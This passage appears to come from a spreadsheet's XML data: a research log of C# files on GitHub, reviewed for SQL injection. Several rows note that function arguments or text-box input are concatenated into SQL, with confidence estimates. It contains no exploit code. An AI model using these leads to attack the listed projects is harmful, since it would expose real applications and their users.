    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/hieuhan/hCMS/raw/88e9844b63369ef7e0cacde29a64368da4f6a25b/CMSLib/Countries.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/kyleedwardsny/mono/raw/83bc1b5a2c0cab4db760c622ac812d5917fd43b7/mcs/class/System.Data.OracleClient/Test/System.Data.OracleClient.jvm/OracleType/OracleType_Date.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/MmejiaLopez/Prototipo2P/raw/64d06f7e1530f4fcf96b914a677c08ce1f3c0971/Programas/Navegador/Modelo/Sentencias.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="18"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Vulnerable if function argument is not sanitized"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/isuha85/XLog/raw/b5514de30a4f96a5f9983524dd69a4f32d808cd5/XLog/Forms/frmColumnInfo.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/PedroTiagoSimao/IvoSuite/raw/df3fb92d7d9caade9c059843c3c31f9534a2f1be/IVO%20Suite/Primavera/RefCli.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/22veloso/CalculadoraProj/raw/29dd7d31e57e82342e6db86c31f659f7f023bac1/CalculadoraProj/Banco.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/pvoudouris/ora2shp/raw/03d8930084a23469fb0ef3647e2745171d5a6bb7/shape2ora/Program.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mort237d/AboutVintageBlazorWebApp/raw/82500a5bd686c5443f903f75f10ecb4a8b086244/AboutVintageApiService/DBUtils/ManageStore.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/antgraf/Embedded-DB-.Net-Performance-Test/raw/63957da3de03b859f298dd3a7d15559532e3cd2f/EmbeddedDbDotNetTest/EmbeddedDbDotNetTest/FireBird/FirebirdClient/FbCommand.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/yoxking/RegistQueueSys-master/raw/6281dc3d807c01a1f34768cf1564dd868f690af3/EntFrm.Business.SQLServerDAL/DsQuartzInfoDAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dnobori/DN-OSS-Learn/raw/66ccad1828369b4a4d2f5ecab87c5d24c87f2762/dotnet-everything-181229/AspNetCore/src/Identity/test/EF.Test/DbUtil.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/devsitecore/DeveloperExercise/raw/d5bda3e556f0d4cfc5f9f167b471e1cc098c9621/Src/AirportsFeedReader.Data/NoSqlDatabaseCacheStorage.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Andrei-Valentin/Proiecte-Universitate2/raw/bc4b53de234054898be7a086aeb38ba13bf88b50/Tehnici%20Avansate%20de%20Programare/Aplicatie/IstoricServicii.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Smitaroyal/salesapp2/raw/c0ec0a73c47e2b9f1dfa27bd7b59e9564c16c910/cont%20back%2014%20-%2002/WebSite5/production/Agent.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/OlafMd/MedCon1.0/raw/7675ef482c0eacbb633677757b77e899ac42530c/mm-libs/dbaccess/Level%201/CL1_CMN/CMN_Country/ORM_CMN_Country.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/RBadgujar-git/sales/raw/6a0aec48e5a8d6d61ba44eeddd732ee8f1e6d573/Inventory%20Project/Sample/TaxnGST.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-14T00:00:00"/>
    <s v="https://github.com/NishiokaTakeo/spider-spiderdocs/raw/77485a3e240981b502913775768d875f2c2bb76a/WebSpiderDocs/Helpers/Customs/DaoBase.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="76"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Function arguments are interpolated into the table. One argument must be an int. The other two are attributes of an instance of a class that extends the abstract class TableBase. It seems likely that these two arguments are sanitized in some way."/>
    <s v="5_x000a_%"/>
    <n v="25"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/1101137106/ASP.NET-MidTermExam/raw/30b265edf1a0dcb8c13df9cfca096af7809c4b5c/KuasCore/Dao/Impl/CourseDao.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/yakup2525/C-KutuphaneOtomasyonu/raw/b8c0e3a22bd1529f57476d66499eaedb413e8fb4/KutuphaneOtomasyon0/KutuphaneOtomasyon0/KitapEkle.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mlagos/ecare/raw/76cbb55e249bef5af60912b8357343119f321a88/ios/familyecare/Util/SQLiteAsync.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Shashika503/Vehicle-Cleaning-Management-System/raw/19f141dbea36cade9ac37294e242acebc5a2ad19/CarWashManagementSystem/CashService.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Xoukoi/Restaurante_Siglo_XXI/raw/81726f33f0f92308cb8e5165c8e4b42c271c9941/Restaurante_Siglo_XXI_Totem/Restaurante_Siglo_XXI_Totem/CrudUsuarios.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/KirkPig/ProjectHouse/raw/94a0d3fd5d694e2251b319d3aee289f68eb81daf/ProjectHouse/frmBillingNew.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/backusd/Finance/raw/0224c278e20f290bc202e3a2e8467d5d4120546f/BucketStrategy/DataBase/DB.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mwrigglesworth/PATS/raw/d1ecdc3596052b321fb4daadfa0c84f08c3aeb1d/App_Code/GIPAP_Objects/Request.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-10T00:00:00"/>
    <s v="https://github.com/ferhat0935/Csharp-ile-Proje-Yonetimi-Otomasyonu/raw/eabc18297bde960a89639a19266d44462bf79119/LisansTezi.v5/LisansTezi/%C4%B0spaketi.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="183"/>
    <x v="1"/>
    <s v="Did not install"/>
    <s v="Appears to concatenate text from a text box, so it is likely vulnerable"/>
    <s v="75_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/DPCFish/TuDu-Task-Manager/raw/2c9ec2131c7ea38bc2afd1750cb2010088b5c555/TuDu/Form1.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/BhimaniRajesh/RitcoLogLiveTest/raw/cfe48237f2ee9e294bdb37971b1406dfd2254cec/GUI/UNI_MIS/Expected%20Arrival/FrmCriteria.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/leofemmy/TSS_Ogun/raw/dd91e6fb49b62a6973694efbc9caca0ee53646f5/Control%20Panel/Forms/FrmSubBusiness.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/fridl-snyk/csharp-test/raw/32f904f87c4fa10005686093e83edbd42fbae61f/src/testcases/CWE89_SQL_Injection/s02/CWE89_SQL_Injection__Web_Params_Get_Web_ExecuteNonQuery_81_goodB2G.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/TaylanKarahan3/PasswordSaver/raw/d6a6f22afe302c3fa187aefa45d06a536a031f57/PasswordSaver/PasswordSaver/Passwords.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/teddydragoone/mono/raw/c3d574a5a45df6934dda2a450f84a34463de1780/mcs/class/System.Data.Linq/src/DbLinq.PostgreSql/PgsqlVendor.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-14T00:00:00"/>
    <s v="https://github.com/mwilian/demos/raw/3ea0318dedb13536024314207812ee1b4e900f34/DAO/POGDataAccess.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="234"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Function arguments are concatenated directly into the sql"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="99.9% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dsalunga/mPortal/raw/3c727231e576c4ab0c3ace21cc412a2cf344974a/Portal/WebParts/SystemPartsG2/SystemPartsG2/AppBundle2/Download/PM_Downloads_Edit_02.ascx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-14T00:00:00"/>
    <s v="https://github.com/iEricZHENG/KiwiCrawler.CASM/raw/6729717bc943b4f23a2be1fad44e85946aef5644/DBUtility/DbHelperOra.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="27"/>
    <x v="3"/>
    <s v="No"/>
    <s v="Dead code"/>
    <s v="0_x000a_%"/>
    <n v="30"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/NNT2910/Mojoportal_Porject_1st/raw/072c46ee743d01ba2be3e64429edc02b9437efdf/mojoPortal.Data.pgsql/DBLanguage.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/jodenrey/LGLC_SYSTEM/raw/d0db70052bcf8225604b62a5e44bb75523b0f747/LGLC_SYSTEM/frmUserSetting.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/kusha40/deskware.in/raw/f152c885a71df4e5d4c0c652a348a3381270c607/amark.deskware.in/Site.master.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-14T00:00:00"/>
    <s v="https://github.com/krishnaMoulicgs/Sewbie_BugFixing/raw/1b629f15b9520318162f1b977c451a10e20a5aa3/Libraries/Nop.BusinessLogic/ExportImport/ExcelHelper.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="96"/>
    <x v="5"/>
    <s v="Did not install"/>
    <s v="Function arguments are concatenated directly into the sql"/>
    <s v="25_x000a_%"/>
    <n v="25"/>
    <s v="ASP.NET MVC 3 projects have limited functionality in Visual Studio 2019"/>
  </r>
  <r>
    <d v="2023-08-14T00:00:00"/>
    <s v="https://github.com/blacklensama/1709/raw/4b471d3ecc7faad8d5b17b715dddc393083c5955/2013-04-01/csExWB/csExWB/DataBase.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="18"/>
    <x v="5"/>
    <s v="Did not install"/>
    <s v="Function argument is concatenated directly into the sql"/>
    <s v="25_x000a_%"/>
    <n v="20"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/DanielLevi3/FinalProject2/raw/e9ba77451fff75b61ba9335808006f88a225dfca/FinalProject2/DAO's/CustomersDAOPGSQL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/lyj0309/order_system/raw/5aff506f9e6e08640cb49830cc4ef0b7de23a7ee/Repositories/Implement/RepositoryBase.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/StevenNo1/Bachelor-Degree-Project/raw/d014469dc46a6c5841fc16016993b69ed2d9de8b/WebSite1/Product/%E5%A5%B3%E7%94%9F%E9%85%8D%E4%BB%B6.aspx.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-14T00:00:00"/>
    <s v="https://github.com/Tom-PIT/Connected/raw/a677368cae826fcc5936031cddc18dae4beeaae0/DataProviders/TomPIT.DataProviders.Sql/Design/Browser.cs"/>
    <x v="4"/>
    <x v="1"/>
    <n v="201"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Function argument is concatenated directly into the sql"/>
    <s v="25_x000a_%"/>
    <n v="30"/>
    <s v="Tom PIT.connected is a free and open source digital experience platform"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/sofyanard/banksulselbar2021-sme/raw/8f0e47bd08b8e69d05d1fb811395a3e3ba177158/Scoring/clsFICounter.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/jedzerna/Group-Messenger-uses-C-and-SQL/raw/bd840d47c230638291e51e0a8238c64df5384d62/GLUGC/Settings.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/capital-phyoethurakyaw/SMSIV_2021/raw/85ffdcd7c61af9fb4890b477e9b269e942aa339a/SMS_DB_Backup/Program.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/JeymyOrtiz14/Proyecto-Libreria/raw/bc991b210843ad8d628a13c7db18546b5b160f66/Sis%20Libreria/frmprestamo.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/caixianqi/RLMedicine/raw/7f93c98654d2708da0d8cf1af7d3ae80c0fd1040/%E6%97%A5%E7%AB%8B%E5%8C%BB%E7%96%97%E7%A8%8B%E5%BA%8F/Backup1/Source/IImportData/DataAcc.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/imamia11/Prodaja/raw/219eb8dffb0474db2c460b676842d8b8940f3de7/Prodaja/DAL/AccessData.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/APHL-Global-Health/BLIS.Core/raw/1e7ea1d1e0273a18597a0c47db468624c217b07e/ThirdParty/mysql-connector-net-6.9.9-src/Source/MySql.Web/SimpleMembershipProvider.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/NguyenDuyCuong/EFormSystem/raw/5144d60a3e4b7012452d67177175e5edd6653c8c/02.Reference/AlbumViewerVNext-master/src/AlbumViewerBusiness/Westwind.BusinessObjects/Utilities/DataAccessBase.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-07T00:00:00"/>
    <s v="https://github.com/kartyeks/Billing/raw/66a4e770ca3df5bd75e1669b83b596f35d627106/HRManager/ExtendedBusinessObjects/Recruitment/Master_CandidateBusinessObject.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="24"/>
    <x v="5"/>
    <s v="Did not install"/>
    <m/>
    <m/>
    <s v="120+"/>
    <s v="Time limit exceeded"/>
  </r>
  <r>
    <d v="2023-08-14T00:00:00"/>
    <s v="https://github.com/Tharnid/Chazwa/raw/f9eb72c9a86506364a0467d8f7674a4a0614617d/BootstrapEx/SamplesData/ProductClasses/ProductManager.cs"/>
    <x v="1"/>
    <x v="3"/>
    <n v="82"/>
    <x v="2"/>
    <s v="Did not install"/>
    <s v="Function argument is concatenated directly into the sql"/>
    <s v="25_x000a_%"/>
    <n v="30"/>
    <s v="This appears to be a personal repository where the creator has experimented with &quot;C# stuff&quot;. Note the names of the folders like &quot;HelloWorld&quot;, &quot;ExampleProject&quot;, and &quot;Whatever&quot;"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Agile-Works/appleseedapp/raw/433501a67eead0032ed19aa1f9d501e1879e1720/Projects/PortableAreas/UserManager/Massive/Massive.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/CodeWithYankub/NewRepo/raw/ba3ee3ba6ae5a19767bbd5786a82c2dbfd829a3f/SLMB_SMS/Models/Registration.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-15T00:00:00"/>
    <s v="https://github.com/zoomla/CMS-Source-code/raw/058828244ff1753f5a74a81432e41ce53234cd63/Zoomla%E9%80%90%E6%B5%AACMS2_x3.9%E6%BA%90%E7%A0%81-mvc/ZoomLa.BLL/Other/B_GradeOption.cs"/>
    <x v="1"/>
    <x v="1"/>
    <n v="96"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Function argument is concatenated directly into the sql"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/MieMie-mmy/Upside_Golf_RCM/raw/dd339adbce789a5fd4bd29d79f79aebc367f83e8/CKSKS_DL/Mall_Setting_Rakhutan_Fixed_DL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/tofilagman/z.SQL/raw/4728940eefd899cb48109ffa8821217d6c24e910/z.SQL/Data/ZTable.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-15T00:00:00"/>
    <s v="https://github.com/blackkingtht/war/raw/b6767d94f756568ebe9ea6dd56e08b778c57c9b4/War/server/server/DBModel/AbstractSQLDBModel.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="260"/>
    <x v="7"/>
    <s v="Did not install"/>
    <s v="Function parameter is interpolated into the sql"/>
    <s v="25_x000a_%"/>
    <n v="15"/>
    <s v="Appears to contain assets for a game made with the Unity game engine"/>
  </r>
  <r>
    <d v="2023-08-15T00:00:00"/>
    <s v="https://github.com/jorik041/osmsharp/raw/cb30ff535717fce3fef5d7f19d0e36a24137d8bc/Data/Oracle/OsmSharp.Osm.Data.Oracle/SimpleSchema/Processor/ChangeSets/OracleSimpleChangeSetApplyTarget.cs"/>
    <x v="2"/>
    <x v="1"/>
    <n v="503"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Function argument is concatenated directly into the sql"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="100% C#"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/araujofa/senai_API/raw/4ca17fe80a0f02d101e8850a2f3f8fb4d5962de6/senai.filmes.webapi/senai.filmes.webapi/Repositories/GeneroRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/ssteenkiste/Sharpmap/raw/cbbea1e096ede415353f6a7663ed189689d1f5f7/SharpMap/Data/Providers/OleDbPoint.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/cool8868/H5Nball/raw/f6351d1b2c262bf8d91b9f90e0ff7a08bfc5b4d8/Dal/NBall/Auto/LeagueNpcManagerProviderAuto.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Javas19/MyUniversityProject/raw/ce7e711bb5b724bf12d1ef42a9b7f7ad04a37038/Areas/Manager/Controllers/MeetingsController.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/mbattaini/StockLoan-Products/raw/41670b025e91483cf0daa45aed86440f97c360d9/ATLAS/Loanstar/TRADINGDATASERVICE/Backup2/StaticDataServer/StaticDataMain.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/Thoris/bolaonet2014/raw/bf0182b7e854e25e45dc220fc7486b2da25ae721/Framework.Tests/Security/DataAccess/UserManagerDao.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/BirukGezahegn/dotnet-api-docs/raw/cad5c75a45d577417072644dbfb37437354fd1cd/snippets/csharp/VS_Snippets_WebNet/System.Web.Profile.ProfileProvider/CS/ProfileProviderSample.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/manuel-martin3/desarrollo/raw/0eac2431f3b7a70999586064466fe0c9307138f0/LayerDataAccess/clienteDA.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-15T00:00:00"/>
    <s v="https://github.com/joethinh/nohros-must/raw/8d96144c969ff8f59d4f7c20eda1b4fc3fb1b22b/src/impl/providers/sqlce/queries/AddStateQuery.cs"/>
    <x v="4"/>
    <x v="1"/>
    <n v="37"/>
    <x v="3"/>
    <s v="Did not install"/>
    <s v="Function argument concatentated directly into sql"/>
    <s v="25_x000a_%"/>
    <n v="10"/>
    <s v="&quot;This project contains several of Nohros' core .NET libraries that we use in our many .NET-based projects.&quot;"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/dashton63/s2msdemo/raw/c355d5e07c93c4214fe082e09862faa636cea826/csharp/S2dbPersonQuery/S2dbPersonQuery/S2dbPersonQuery.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="8"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-15T00:00:00"/>
    <s v="https://github.com/TheBigBang2/GroupProject223/raw/d8b98322dc35a1da43ff7ae7244064451cfed4db/GroupProject223/MaintainBooking.cs"/>
    <x v="2"/>
    <x v="3"/>
    <n v="142"/>
    <x v="1"/>
    <s v="Did not install"/>
    <s v="Input from text box is concatentated directly into the sql"/>
    <s v="90_x000a_%"/>
    <n v="10"/>
    <s v="Based on the name of the repo &quot;GroupProject223&quot;, this is likely a student project. It is vulnerable to SQL-IA, but not SQL-IDIA"/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/longboynd9/sHRM_SSBM/raw/feb1564216d9cfb6c9d47b2c944eaff3ca023410/Class/SSYT_Class/Luong/XuLyDuLieu_1dong.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/vincema1/smartpersonalfinaces/raw/ed0cf7ac7f8f03dd4de096712b88671ca0dd8875/PersonalFinances.DATA/AdoRepository.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/drazenzadravec/nequeo/raw/c512b3758a741cf971de6eca3f4779442fb633f6/Source/Components/Data/Provider/Nequeo.Data.Odbc.Provider/Nequeo.Data.Odbc.Provider/base/DataAccess.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/BrandynCoverdill/Capstone-2020/raw/a3185965ae746d7abab9efdd5983dcd2323df76e/PetUniverse/DataAccessLayer/JobListingAccessor.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/weberli0707/K3CloudCs20180801-136c42f8d282e5706fa8ea3cdcacc618b280c413/raw/8ea6592428f052e47ec950a8a54475041194faa6/K3CloudCs/DAL/Edb_STKTRANSFERIN_DAL.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <m/>
    <s v="https://github.com/KristiyanKnizharov/Software-University/raw/b81699b32536edb6992f6e74e816bad9ea518b86/Entity%20Framework%20Core/Exercise/01.%20ADO.NET/CSharpDatabaseAdvanced-ADO.NET/P04.AddMinion/StartUp.cs"/>
    <x v="0"/>
    <x v="0"/>
    <m/>
    <x v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <d v="2023-08-16T00:00:00"/>
    <s v="https://github.com/arqum123/_HRM/raw/afc0b3eb5683137a6b6fa716f66e09e2c2e0568b/HRM.Repository/UserTypeRepository.base.cs"/>
    <x v="5"/>
    <x v="1"/>
    <n v="111"/>
    <x v="5"/>
    <s v="Did not install"/>
